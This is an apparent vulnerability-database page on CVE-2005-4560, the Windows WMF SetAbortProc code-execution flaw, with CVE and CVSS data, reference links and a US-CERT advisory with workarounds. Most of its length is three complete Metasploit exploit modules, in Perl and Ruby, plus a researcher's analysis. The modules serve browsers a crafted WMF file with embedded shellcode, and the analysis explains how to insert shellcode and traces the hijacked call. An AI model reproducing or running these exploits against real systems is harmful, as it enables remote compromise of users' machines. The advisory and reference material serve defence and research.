CVE-2005-4560
CVSS 7.5
Published: 2005-12-28 14:03:00
Revised: 2011-09-22 00:00:00

[Original] The Windows Graphical Device Interface library (GDI32.DLL) in Microsoft Windows allows remote attackers to execute arbitrary code via a Windows Metafile (WMF) format image with a crafted SETABORTPROC GDI Escape function call, related to the Windows Picture and Fax Viewer (SHIMGVW.DLL), a different vulnerability than CVE-2005-2123 and CVE-2005-2124, and as originally discovered in the wild on unionseek.com.


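[CNNVD] Microsoft Windows Graphics Rendering Engine WMF Format Code Execution Vulnerability (CNNVD-200512-584)

        Microsoft Windows is a very popular operating system released by Microsoft.
        The WMF graphics rendering engine in Microsoft Windows has a remote code execution vulnerability. If a user is tricked into opening a malicious WMF file, arbitrary code is executed on the user's system with the user's privileges when the engine parses the file.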

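- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CWE (weakness category)

CWE-20 [Improper Input Validation]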

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_xp:::media_center
cpe:/o:microsoft:windows_2003_server:standard:sp1
cpe:/o:microsoft:windows_xp:::home
cpe:/o:microsoft:windows_2003_server:r2::64-bit
cpe:/o:microsoft:windows_xp::gold:professional  (Microsoft Windows XP Professional Gold)
cpe:/o:microsoft:windows_xp::sp2:home
cpe:/o:microsoft:windows_xp::sp2:media_center  (Microsoft windows xp_sp2 media_center)
cpe:/o:microsoft:windows_2003_server:web
cpe:/o:microsoft:windows_xp::sp2:tablet_pc  (Microsoft windows xp_sp2 tablet_pc)
cpe:/o:microsoft:windows_2003_server:enterprise::64-bit
cpe:/o:microsoft:windows_2003_server:web:sp1
cpe:/o:microsoft:windows_2003_server:r2:sp1
cpe:/o:microsoft:windows_2003_server:standard::64-bit
cpe:/o:microsoft:windows_xp::sp1:home
cpe:/o:microsoft:windows_2003_server:enterprise:sp1
cpe:/o:microsoft:windows_xp::sp1:media_center  (Microsoft windows xp_sp1 media_center)

- OVAL (technical details for detection)

oval:org.mitre.oval:def:1612  Server 2003 Graphics Rendering Engine Vulnerability
oval:org.mitre.oval:def:1564  WinXP,SP1 Graphics Rendering Engine Vulnerability
oval:org.mitre.oval:def:1492  WinXP (64-bit) Graphics Rendering Engine Vulnerability
oval:org.mitre.oval:def:1460  Server 2003,SP1 Graphics Rendering Engine Vulnerability
oval:org.mitre.oval:def:1433  WinXP,SP2 Graphics Rendering Engine Vulnerability
oval:org.mitre.oval:def:1431  Win2K Graphics Rendering Engine Vulnerability
*OVAL describes in detail how to detect this vulnerability; more technical details on detecting it can be found in the related OVAL definitions.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4560
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4560
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-584
(official data source) CNNVD

- Other links and resources

http://www.us-cert.gov/cas/techalerts/TA06-005A.html
(VENDOR_ADVISORY)  CERT  TA06-005A
http://www.us-cert.gov/cas/techalerts/TA05-362A.html
(VENDOR_ADVISORY)  CERT  TA05-362A
http://www.kb.cert.org/vuls/id/181038
(VENDOR_ADVISORY)  CERT-VN  VU#181038
http://www.microsoft.com/technet/security/bulletin/ms06-001.mspx
(PATCH)  MS  MS06-001
http://xforce.iss.net/xforce/xfdb/23846
(UNKNOWN)  XF  win-wmf-execute-code(23846)
http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=375420
(UNKNOWN)  MISC  http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=375420
http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=375341
(UNKNOWN)  MISC  http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?cscat=BLTNDETAIL&DocumentOID=375341
http://www.vupen.com/english/advisories/2005/3086
(VENDOR_ADVISORY)  VUPEN  ADV-2005-3086
http://www.securityfocus.com/bid/16074
(UNKNOWN)  BID  16074
http://www.securityfocus.com/archive/1/archive/1/420773/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060104 Another WMF exploit workaround
http://www.securityfocus.com/archive/1/archive/1/420687/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060103 Re: [funsec] WMF round-up, updates and de-mystification
http://www.securityfocus.com/archive/1/archive/1/420684/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060103 WMF SETABORTPROC exploit
http://www.securityfocus.com/archive/1/archive/1/420682/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060103 WMF round-up, updates and de-mystification
http://www.securityfocus.com/archive/1/archive/1/420664/30/7730/threaded
(UNKNOWN)  BUGTRAQ  20060101 Re: RE: WMF Exploit
http://www.securityfocus.com/archive/1/archive/1/420546/30/7730/threaded
(UNKNOWN)  BUGTRAQ  20051229 RE: WMF Exploit
http://www.securityfocus.com/archive/1/archive/1/420446/100/0/threaded
(UNKNOWN)  BUGTRAQ  20051229 WMF exploit
http://www.securityfocus.com/archive/1/archive/1/420378/100/0/threaded
(UNKNOWN)  BUGTRAQ  20051228 WMF Exploit
http://www.securityfocus.com/archive/1/archive/1/420367/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20051228 Re: Is this a new exploit?
http://www.securityfocus.com/archive/1/archive/1/420357/100/0/threaded
(UNKNOWN)  BUGTRAQ  20051228 RE: [Full-disclosure] Someone wasted a nice bug on spyware...
http://www.securityfocus.com/archive/1/archive/1/420351/100/0/threaded
(UNKNOWN)  BUGTRAQ  20051227 Exploitation of Windows WMF on the web
http://www.securityfocus.com/archive/1/archive/1/420288/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20051227 Is this a new exploit?
http://www.microsoft.com/technet/security/advisory/912840.mspx
(VENDOR_ADVISORY)  MISC  http://www.microsoft.com/technet/security/advisory/912840.mspx
http://www.f-secure.com/weblog/archives/archive-122005.html#00000753
(VENDOR_ADVISORY)  MISC  http://www.f-secure.com/weblog/archives/archive-122005.html#00000753
http://vil.mcafeesecurity.com/vil/content/v_137760.htm
(VENDOR_ADVISORY)  MISC  http://vil.mcafeesecurity.com/vil/content/v_137760.htm
http://support.avaya.com/elmodocs2/security/ASA-2006-001.htm
(VENDOR_ADVISORY)  MISC  http://support.avaya.com/elmodocs2/security/ASA-2006-001.htm
http://securitytracker.com/id?1015416
(UNKNOWN)  SECTRACK  1015416
http://secunia.com/advisories/18415
(VENDOR_ADVISORY)  SECUNIA  18415
http://secunia.com/advisories/18364
(VENDOR_ADVISORY)  SECUNIA  18364
http://secunia.com/advisories/18311
(VENDOR_ADVISORY)  SECUNIA  18311
http://secunia.com/advisories/18255
(VENDOR_ADVISORY)  SECUNIA  18255
http://linuxbox.org/pipermail/funsec/2006-January/002455.html
(UNKNOWN)  MISC  http://linuxbox.org/pipermail/funsec/2006-January/002455.html

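- Vulnerability information

Microsoft Windows Graphics Rendering Engine WMF Format Code Execution Vulnerability
High risk  Input validation
2005-12-28 00:00:00 2006-06-06 00:00:00
Remote
        Microsoft Windows is a very popular operating system released by Microsoft.
        The WMF graphics rendering engine in Microsoft Windows has a remote code execution vulnerability. If a user is tricked into opening a malicious WMF file, arbitrary code is executed on the user's system with the user's privileges when the engine parses the file.

- Advisories and patches

        The vendor has released an upgrade patch that fixes this security issue. Patch link:
        http://www.microsoft.com/technet/security/Bulletin/MS06-001.mspx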

- Vulnerability information (1391)

Windows XP/2003 Metafile Escape() Code Execution Exploit (meta) (EDBID:1391)
windows remote
2005-12-27 Verified
0 H D Moore
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::ie_xp_pfv_metafile;

use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;

my $advanced =
  {
  };

my $info =
  {
	'Name'           => 'Windows XP/2003 Metafile Escape() SetAbortProc Code Execution',
	'Version'        => '$Revision: 1.8 $',
	'Authors'        =>
	  [
		'H D Moore <hdm [at] metasploit.com>',
		'san <san [at] xfocus.org>',
		'O600KO78RUS[at]unknown.ru'
	  ],

	'Description'    =>
	  Pex::Text::Freeform(qq{
			This module exploits a vulnerability in the GDI library included with
			Windows XP and 2003. This vulnerability uses the 'Escape' metafile function
			to execute arbitrary code through the SetAbortProc procedure. This module
			generates a random WMF record stream for each request.
}),

	'Arch'           => [ 'x86' ],
	'OS'             => [ 'win32', 'winxp', 'win2003' ],
	'Priv'           => 0,

	'UserOpts'       =>
	  {
		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
	  },

	'Payload'        =>
	  {
		'Space'    => 1000 + int(rand(256)) * 4,
		'BadChars' => "\x00",
		'Keys'     => ['-bind'],
	  },
	'Refs'           =>
	  [
	  	['BID', '16074'],
		['CVE', '2005-4560'],
	  	['OSVDB', '21987'],
		['MIL', '111'],	
		['URL', 'http://wvware.sourceforge.net/caolan/ora-wmf.html'],
		['URL', 'http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt'],
	  ],

	'DefaultTarget'  => 0,
	'Targets'        =>
	  [
		[ 'Automatic - Windows XP / Windows 2003' ]
	  ],
	
	'Keys'           => [ 'wmf' ],

	'DisclosureDate' => 'Dec 27 2005',
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit
{
	my $self = shift;
	my $server = IO::Socket::INET->new(
		LocalHost => $self->GetVar('HTTPHOST'),
		LocalPort => $self->GetVar('HTTPPORT'),
		ReuseAddr => 1,
		Listen    => 1,
		Proto     => 'tcp'
	);
	my $client;

	# Did the listener create fail?
	if (not defined($server)) {
		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
		return;
	}
	
	my $httphost = $self->GetVar('HTTPHOST');
	if ($httphost eq '0.0.0.0') {
		$httphost = Pex::Utils::SourceIP('1.2.3.4');
	}

	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");

	while (defined($client = $server->accept())) {
		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
	}

	return;
}

sub HandleHttpClient
{
	my $self = shift;
	my $fd   = shift;

	# Set the remote host information
	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
		

	# Read the HTTP command
	my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);

 	
	if ($url !~ /\.wmf/i) {
		$self->PrintLine("[*] HTTP Client connected from $rhost:$rport, redirecting...");
		
		# XXX This could be replaced by obfuscated javascript too...
		
		# Transmit the HTTP redirect response
		$fd->Send(
			"HTTP/1.0 302 Moved\r\n" .
			"Location: /". Pex::Text::AlphaNumText(int(rand(1024)+1))  .".wmf\r\n" .
			"Content-Type: text/html\r\n" .
			"Content-Length: 0\r\n" .
			"Connection: close\r\n" .
			"\r\n"
		  );

		$fd->Close();
		
		return;		
	}
	
	my $shellcode = $self->GetVar('EncodedPayload')->Payload;

	# Push our minimum length just over the ethernet MTU
	my $pre_mlen = 1440 + rand(8192);
	my $suf_mlen = rand(8192)+128;
	
	# The number of random objects we generated
	my $fill = 0;
	
	# The buffer of random bogus objects
	my $pre_buff = "";
	my $suf_buff = "";

	while (length($pre_buff) < $pre_mlen && $fill < 65535) {
		$pre_buff .= RandomWMFRecord();
		$fill += 1;
	}

	while (length($suf_buff) < $suf_mlen && $fill < 65535) {
		$suf_buff .= RandomWMFRecord();
		$fill += 1;
	}

	my $clen = 18 + 8 + 6 + length($shellcode) + length($pre_buff) + length($suf_buff);
	my $content =
		#
		# WindowsMetaHeader
		#
		pack('vvvVvVv',
				# WORD  FileType;       /* Type of metafile (0=memory, 1=disk, 2=fjear) */
				2,
				# WORD  HeaderSize;     /* Size of header in WORDS (always 9) */
				9,
				# WORD  Version;        /* Version of Microsoft Windows used */
				0x0300,
				# DWORD FileSize;       /* Total size of the metafile in WORDs */
				$clen/2,
				# WORD  NumOfObjects;   /* Number of objects in the file */
				$fill+1,
				# DWORD MaxRecordSize;  /* The size of largest record in WORDs */
				int(rand(64)+8),
				# WORD  NumOfParams;    /* Not Used (always 0) */
				0
		).
		#
		# Filler data
		#
		$pre_buff.
		#
		# StandardMetaRecord - Escape()
		#
		pack('Vvv',
			# DWORD Size;          /* Total size of the record in WORDs */
			4,
			# WORD  Function;      /* Function number (defined in WINDOWS.H) */
			0x0026,                # Can also be 0xff26, 0x0626, etc...
			# WORD  Parameters[];  /* Parameter values passed to function */
			9,
		). $shellcode .
		#
		# Filler data
		#
		$suf_buff.
		#
		# Complete the structure
		#
		pack('Vv',
			3,
			0
		);

	
	$self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)." bytes of payload...");


	# Transmit the HTTP response
	my $req = 		
		"HTTP/1.0 200 OK\r\n" .
		"Content-Type: text/plain\r\n" .
		"Content-Length: " . length($content) . "\r\n" .
		"Connection: close\r\n" .
		"\r\n" .
		$content;
		
		
	my $res = $fd->Send($req);

	# Prevents IE from throwing an error in some cases
	select(undef, undef, undef, 0.1);
	
	$fd->Close();
	
	# The Content-Disposition trick was not very reliable (2003 ignores it)
	#    "Content-Disposition: inline; filename=". Pex::Text::AlphaNumText(int(rand(1024)+1)) .".jpg\r\n".
}


sub RandomWMFRecord {
	my $type = int(rand(3));

	if ($type == 0)	{
		# CreatePenIndirect
		return pack('Vv',
			8,
			0x02FA
		). Pex::Text::RandomData(10)
	}
	elsif ( $type == 1 ) {
		# CreateBrushIndirect
		return pack('Vv',
			7,
			0x02FC
		). Pex::Text::RandomData(8)
	}
	else {
		# Rectangle
		return pack('Vv',
			7,
			0x041B
		). Pex::Text::RandomData(8)
	}
}


1;

__END__

Used with permission by san[at]xfocus.org:
------------------------------------------

The recent wmf vul is really fun, I found some interesting things after
analysing it. I attached a very simple wmf file (64 bytes) which can crash
your explorer. You can simply change those 0xcc to your shellcode.

An attack wmf file is constructed with an 18-byte metafile header which
is defined as follows:

typedef struct _WindowsMetaHeader
{
  WORD  FileType;       /* Type of metafile (0=memory, 1=disk) */
  WORD  HeaderSize;     /* Size of header in WORDS (always 9) */
  WORD  Version;        /* Version of Microsoft Windows used */
  DWORD FileSize;       /* Total size of the metafile in WORDs */
  WORD  NumOfObjects;   /* Number of objects in the file */
  DWORD MaxRecordSize;  /* The size of largest record in WORDs */
  WORD  NumOfParams;    /* Not Used (always 0) */
} WMFHEAD;

and two data records which are defined as follows:

typedef struct _StandardMetaRecord
{
    DWORD Size;          /* Total size of the record in WORDs */
    WORD  Function;      /* Function number (defined in WINDOWS.H) */
    WORD  Parameters[];  /* Parameter values passed to function */
} WMFRECORD;

Some things that we need to pay attention to:

1. FileSize of _WindowsMetaHeader is in WORDs, don't forget to divide by 2;
2. the attack file is larger than 64 bytes;
3. the last record always has a function number of 0000h, a Size of
00000003h, and no Parameters array;
4. the attack record has a function number of 0626h, which is defined in
wingdi.h. 26h is important, it will flow to the Escape function. I found
it will lead to SetAbortProc only if Parameters[0] is 0009h.

.text:77C4B65C loc_77C4B65C:                           ; CODE XREF: PlayMetaFileRecord+43j
.text:77C4B65C                                         ; DATA XREF: .text:off_77C769FE+o
.text:77C4B65C                 push    [ebp+uFlags]    ; case 0x26
.text:77C4B65F                 push    ebx
.text:77C4B660                 call    sub_77C4B68A
.text:77C4B665                 cmp     eax, edi
.text:77C4B667                 mov     [ebp+var_4], eax
.text:77C4B66A                 jnz     loc_77C4B424
.text:77C4B670                 mov     ax, [ebx+6]
.text:77C4B674                 cmp     ax, 0Fh
.text:77C4B678                 jnz     loc_77C5FC0A    ; flow to Escape
...
.text:77C61062 loc_77C61062:                           ; CODE XREF: Escape+ECB7j
.text:77C61062                 sub     edi, 6
.text:77C61065                 jz      short loc_77C61090 ; it flow to SetAbortProc only the Parameters[0] is 0009h
...
.text:77C543E7 loc_77C543E7:                           ; CODE XREF: SetAbortProc+54j
.text:77C543E7                                         ; SetAbortProc+10720tj
.text:77C543E7                 xor     eax, eax
.text:77C543E9                 mov     [esi+14h], edi  ; write callback pointer?
...
.text:77C604C8 owned:                                  ; CODE XREF: sub_77C4B09C+1E4j
.text:77C604C8                 mov     eax, [eax+14h]  ; the pointer
.text:77C604CB                 cmp     eax, ecx
.text:77C604CD                 jz      loc_77C4B286
.text:77C604D3                 push    ecx
.text:77C604D4                 push    edi
.text:77C604D5                 call    eax             ; got it

Best Regards
--
san <san[at]xfocus.org>

# milw0rm.com [2005-12-27]
		

- Vulnerability information (16612)

Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution (EDBID:16612)
windows remote
2010-09-20 Verified
0 metasploit
##
# $Id: ms06_001_wmf_setabortproc.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	#
	# This module acts as an HTTP server
	#
	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution',
			'Description'    => %q{
					This module exploits a vulnerability in the GDI library included with
				Windows XP and 2003. This vulnerability uses the 'Escape' metafile function
				to execute arbitrary code through the SetAbortProc procedure. This module
				generates a random WMF record stream for each request.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'hdm',
					'san <san@xfocus.org>',
					'O600KO78RUS@unknown.ru',
				],
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2005-4560'],
					['OSVDB', '21987'],
					['MSB', 'MS06-001'],
					['BID', '16074'],
					['URL', 'http://www.microsoft.com/technet/security/advisory/912840.mspx'],
					['URL', 'http://wvware.sourceforge.net/caolan/ora-wmf.html'],
					['URL', 'http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 1000 + (rand(256).to_i * 4),
					'BadChars' => "\x00",
					'Compat'   =>
						{
							'ConnectionType' => '-find',
						},
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows XP/2003/Vista Automatic', { }],
				],
			'DisclosureDate' => 'Dec 27 2005',
			'DefaultTarget'  => 0))
	end

	def on_request_uri(cli, request)

		ext = 'wmf'

		if (not request.uri.match(/\.wmf$/i))
			if ("/" == get_resource[-1,1])
				wmf_uri = get_resource[0, get_resource.length - 1]
			else
				wmf_uri = get_resource
			end
			wmf_uri << "/" + rand_text_alphanumeric(rand(80)+16) + "." + ext

			html = "<html><meta http-equiv='refresh' content='0; " +
				"URL=#{wmf_uri}'><body>One second please...</body></html>"
			send_response_html(cli, html)
			return
		end

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the compressed response to the client
		send_response(cli, generate_metafile(p), { 'Content-Type' => 'text/plain' })

		# Handle the payload
		handler(cli)
	end

	def generate_metafile(payload)

		# Minimal length values before and after the Escape record
		pre_mlen = 1440 + rand(8192)
		suf_mlen = 128  + rand(8192)

		# Track the number of generated records
		fill = 0

		# The prefix and suffix buffers
		pre_buff = ''
		suf_buff = ''

		# Generate the prefix
		while (pre_buff.length < pre_mlen)
			pre_buff << generate_record()
			fill += 1
		end

		# Generate the suffix
		while (suf_buff.length < suf_mlen)
			suf_buff << generate_record()
			fill += 1
		end

		clen = 18 + 8 + 6 + payload.encoded.length + pre_buff.length + suf_buff.length
		data =
			#
			# WindowsMetaHeader
			#
			[
				# WORD  FileType;       /* Type of metafile (1=memory, 2=disk) */
				rand(2)+1,
				# WORD  HeaderSize;     /* Size of header in WORDS (always 9) */
				9,
				# WORD  Version;        /* Version of Microsoft Windows used */
				( rand(2).to_i == 1 ? 0x0300 : 0x0100 ),
				# DWORD FileSize;       /* Total size of the metafile in WORDs */
				clen/2,
				# WORD  NumOfObjects;   /* Number of objects in the file */
				rand(0xffff),
				# DWORD MaxRecordSize;  /* The size of largest record in WORDs */
				rand(0xffffffff),
				# WORD  NumOfParams;    /* Not Used (always 0) */
				rand(0xffff),
			].pack('vvvVvVv') +
			#
			# Filler data
			#
			pre_buff +
			#
			# StandardMetaRecord - Escape()
			#
			[
				# DWORD Size;          /* Total size of the record in WORDs */
				4,
				# WORD  Function;      /* Function number (defined in WINDOWS.H) */
				(rand(256).to_i << 8) + 0x26,
				# WORD  Parameters[];  /* Parameter values passed to function */
				9,
			].pack('Vvv') + payload.encoded +
			#
			# Filler data
			#
			suf_buff +
			#
			# Complete the stream
			#
			[3, 0].pack('Vv') +
			#
			# Some extra fun padding
			#
			rand_text(rand(16384)+1024)

		return data

	end

	def generate_record
		type = rand(3)

		case type
			when 0
				# CreatePenIndirect
				return [8, 0x02fa].pack('Vv') + rand_text(10)
			when 1
				# CreateBrushIndirect
				return [7, 0x02fc].pack('Vv') + rand_text(8)
			else
				# Rectangle
				return [7, 0x041b].pack('Vv') + rand_text(8)
		end
	end

end
		

- Vulnerability information (F82985)

Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution (PacketStormID:F82985)
2009-11-26 00:00:00
H D Moore,san,O600KO78RUS  metasploit.com
exploit,arbitrary
windows,xp
CVE-2005-4560

This Metasploit module exploits a vulnerability in the GDI library included with Windows XP and 2003. This vulnerability uses the 'Escape' metafile function to execute arbitrary code through the SetAbortProc procedure. This Metasploit module generates a random WMF record stream for each request.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	#
	# This module acts as an HTTP server
	#
	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution',
			'Description'    => %q{
				This module exploits a vulnerability in the GDI library included with
				Windows XP and 2003. This vulnerability uses the 'Escape' metafile function
				to execute arbitrary code through the SetAbortProc procedure. This module
				generates a random WMF record stream for each request.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 
				[ 
					'hdm', 
					'san <san@xfocus.org>',
					'O600KO78RUS@unknown.ru',
				],
			'Version'        => '$Revision$',
			'References'     => 
				[
					['CVE', '2005-4560'],
	  				['OSVDB', '21987'],
					['MSB', 'MS06-001'],
	  				['BID', '16074'],
					['URL', 'http://www.microsoft.com/technet/security/advisory/912840.mspx'],					
					['URL', 'http://wvware.sourceforge.net/caolan/ora-wmf.html'],
					['URL', 'http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 1000 + (rand(256).to_i * 4),
					'BadChars' => "\x00",
					'Compat'   => 
						{
							'ConnectionType' => '-find',
						},
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows XP/2003/Vista Automatic', { }],
				],
			'DisclosureDate' => 'Dec 27 2005',
			'DefaultTarget'  => 0))
	end

	def on_request_uri(cli, request)
	
	
		ext = 'wmf'
	
		if (not request.uri.match(/\.wmf$/i))
			html =
				"<html><meta http-equiv='refresh' content='0; URL=" +
				get_resource + '/' + 
				rand_text_alphanumeric(rand(80)+16) + 
				".#{ext}'><body>One second please...</body></html>"
			send_response_html(cli, html)
			return
		end

		# Re-generate the payload
		return if ((p = regenerate_payload(cli)) == nil)

		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the compressed response to the client
		send_response(cli, generate_metafile(p), { 'Content-Type' => 'text/plain' })
		
		# Handle the payload
		handler(cli)
	end
	
	def generate_metafile(payload)
		
		# Minimal length values before and after the Escape record
		pre_mlen = 1440 + rand(8192)
		suf_mlen = 128  + rand(8192)
		
		# Track the number of generated records
		fill = 0
		
		# The prefix and suffix buffers
		pre_buff = ''
		suf_buff = ''
		
		# Generate the prefix
		while (pre_buff.length < pre_mlen) 
			pre_buff << generate_record()
			fill += 1
		end
		
		# Generate the suffix
		while (suf_buff.length < suf_mlen) 
			suf_buff << generate_record()
			fill += 1
		end
		
		clen = 18 + 8 + 6 + payload.encoded.length + pre_buff.length + suf_buff.length
		data =
			#
			# WindowsMetaHeader
			#
			[
				# WORD  FileType;       /* Type of metafile (1=memory, 2=disk) */
				rand(2)+1,
				# WORD  HeaderSize;     /* Size of header in WORDS (always 9) */
				9,
				# WORD  Version;        /* Version of Microsoft Windows used */
				( rand(2).to_i == 1 ? 0x0300 : 0x0100 ),
				# DWORD FileSize;       /* Total size of the metafile in WORDs */
				clen/2,
				# WORD  NumOfObjects;   /* Number of objects in the file */
				rand(0xffff),
				# DWORD MaxRecordSize;  /* The size of largest record in WORDs */
				rand(0xffffffff),
				# WORD  NumOfParams;    /* Not Used (always 0) */
				rand(0xffff),
			].pack('vvvVvVv') +
			#
			# Filler data
			#
			pre_buff +
			#
			# StandardMetaRecord - Escape()
			#
			[
				# DWORD Size;          /* Total size of the record in WORDs */
				4,
				# WORD  Function;      /* Function number (defined in WINDOWS.H) */
				(rand(256).to_i << 8) + 0x26,
				# WORD  Parameters[];  /* Parameter values passed to function */
				9,			
			].pack('Vvv') + payload.encoded +
			#
			# Filler data
			#
			suf_buff +
			#
			# Complete the stream
			#
			[3, 0].pack('Vv') +
			#
			# Some extra fun padding
			#
			rand_text(rand(16384)+1024)
		
		return data
		
	end
	
	def generate_record
		type = rand(3)
		
		case type
			when 0
				# CreatePenIndirect
				return [8, 0x02fa].pack('Vv') + rand_text(10)
			when 1
				# CreateBrushIndirect
				return [7, 0x02fc].pack('Vv') + rand_text(8)			
			else
				# Rectangle
				return [7, 0x041b].pack('Vv') + rand_text(8)
		end
	end


end
    

- Vulnerability information (F42701)

Technical Cyber Security Alert 2005-362A (PacketStormID:F42701)
2005-12-31 00:00:00
US-CERT  us-cert.gov
advisory,remote,code execution
windows,xp
CVE-2005-4560

Technical Cyber Security Alert TA05-362A - Microsoft Windows is vulnerable to remote code execution via an error in handling files using the Windows Metafile image format. Exploit code has been publicly posted and used to successfully attack fully-patched Windows XP SP2 systems. However, other versions of the Windows operating system may be at risk as well.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Microsoft Windows Metafile Handling Buffer Overflow

   Original release date: December 28, 2005
   Last revised: --
   Source: US-CERT

Systems Affected

     * Systems running Microsoft Windows

Overview

   Microsoft Windows is vulnerable to remote code execution via an error
   in handling files using the Windows Metafile image format. Exploit
   code has been publicly posted and used to successfully attack
   fully-patched Windows XP SP2 systems. However, other versions of the
   Windows operating system may be at risk as well.

I. Description

   Microsoft Windows Metafiles are image files that can contain both
   vector and bitmap-based picture information. Microsoft Windows
   contains routines for displaying various Windows Metafile formats.
   However, a lack of input validation in one of these routines may allow
   a buffer overflow to occur, and in turn may allow remote arbitrary
   code execution.

   This new vulnerability may be similar to one Microsoft released
   patches for in Microsoft Security Bulletin MS05-053. However, publicly
   available exploit code is known to affect systems updated with the
   MS05-053 patches.

   Not all anti-virus software products are currently able to detect all
   known variants of exploits for this vulnerability. However, US-CERT
   recommends updating anti-virus signatures as frequently as practical
   to provide maximum protection as new variants appear.

   US-CERT is tracking this issue as VU#181038. This reference number
   corresponds to CVE entry CVE-2005-4560.

II. Impact

   A remote, unauthenticated attacker may be able to execute arbitrary
   code if the user is persuaded to view a specially crafted Windows
   Metafile.

III. Solution

   Since there is no known patch for this issue at this time, US-CERT is
   recommending sites follow several potential workarounds.

Workarounds

   Please be aware US-CERT has confirmed that filtering based just on the
   WMF file extension or MIME type "application/x-msmetafile" will not
   block all known attack vectors for this vulnerability. Filter
   mechanisms should be looking for any file that Microsoft Windows
   recognizes as a Windows Metafile by virtue of its file header.

Do not access Windows Metafiles from untrusted sources

   Exploitation occurs by accessing a specially crafted Windows Metafile.
   By only accessing Windows Metafiles from trusted or known sources, the
   chances of exploitation are reduced.

   Attackers may host malicious Windows Metafiles on a web site. In order
   to convince users to visit their sites, those attackers often use URL
   encoding, IP address variations, long URLs, intentional misspellings,
   and other techniques to create misleading links. Do not click on
   unsolicited links received in email, instant messages, web forums, or
   internet relay chat (IRC) channels. Type URLs directly into the
   browser to avoid these misleading links. While these are generally
   good security practices, following these behaviors will not prevent
   exploitation of this vulnerability in all cases, particularly if a
   trusted site has been compromised or allows cross-site scripting.

Block access to Windows Metafiles at network perimeters

   By blocking access to Windows Metafiles using HTTP proxies, mail
   gateways, and other network filter technologies, system administrators
   may also limit other potential attack vectors.

Reset the program association for Windows Metafiles

   Remapping handling of Windows Metafiles to open a program other than
   the default Windows Picture and Fax Viewer (SHIMGVW.DLL) may prevent
   exploitation via some current attack vectors. However, this may still
   allow the underlying vulnerability to be exploited via other known
   attack vectors.
   _________________________________________________________________


   This document is also available at

   <http://www.us-cert.gov/cas/techalerts/TA05-362A.html>

   Updates will be made at

   <http://www.kb.cert.org/vuls/id/181038>

   Feedback can be directed to

